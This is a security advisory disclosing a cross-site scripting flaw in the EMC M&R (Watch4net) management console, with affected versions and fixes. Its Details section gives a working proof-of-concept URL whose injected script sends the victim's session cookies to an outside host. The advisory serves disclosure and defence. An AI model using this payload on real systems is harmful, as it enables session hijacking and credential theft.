EMC M&R (Watch4net) Centralized Management Console XSS

`------------------------------------------------------------------------  
Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized  
Management Console  
------------------------------------------------------------------------  
Han Sahin, November 2014  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)  
Centralized Management Console. This issue allows attackers to perform a  
wide variety of actions, such as stealing victims' session tokens or  
login credentials, performing arbitrary actions on their behalf, logging  
their keystrokes, or exploit issues in other areas of Watch4net.  
  
------------------------------------------------------------------------  
Affected products  
------------------------------------------------------------------------  
EMC reports that the following products are affected by this  
vulnerability:  
  
- EMC M&R (Watch4Net) versions prior 6.5u1  
- EMC ViPR SRM versions prior to 3.6.1  
  
------------------------------------------------------------------------  
See also  
------------------------------------------------------------------------  
- CVE-2015-0513  
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
EMC released the following updated versions that resolve this  
vulnerability:  
  
- EMC M&R (Watch4Net) 6.5u1  
- EMC ViPR SRM 3.6.1  
  
Registered customers can download upgraded software from support.emc.com  
at https://support.emc.com/downloads/34247_ViPR-SRM.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html  
  
This vulnerability can be exploited using the answerLocations[0].blockName URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.  
  
The following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies:  
  
http://<target>:58080/centralized-management/locker/update?answer={%22gateway%22:{}}&answerLocations%5B0%5D.answerId=topologyservice.gateway&answerLocations%5B0%5D.blockId=generic-rsc&answerLocations%5B0%5D.blockInstance=Generic-RSC&answerLocations%5B0%5D.blockName=generic-rsc%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&answerLocations%5B0%5D.blockVersion=3.1.1&answerLocations%5B0%5D.serverId=sdfef19fb&answerLocations%5B0%5D.spId=&answerLocations%5B1%5D.answerId=topologyservice.gateway&answerLocations%5B1%5D.blockId=generic-snmp&answerLocations%5B1%5D.blockInstance=Generic-SNMP&answerLocations%5B1%5D.blockName=generic-snmp&answerLocations%5B1%5D.blockVersion=3.1.1&answerLocations%5B1%5D.serverId=sdfef19fb&answerLocations%5B1%5D.spId=&answerLocations%5B2%5D.answerId=arbiter.backend%5B0%5D.webservice.gateway&answerLocations%5B2%5D.blockId=load-balancer-arbiter&answerLocations%5B2%5D.blockInstance=Load-Balancer&answerLocations%5B2%5D.blockName=load-balancer-arbiter&answerLocations%5B2%5D.blockVersion=3.1.1&answerLocations%5B2%5D.serverId=sdfef19fb&answerLocations%5B2%5D.spId=  
`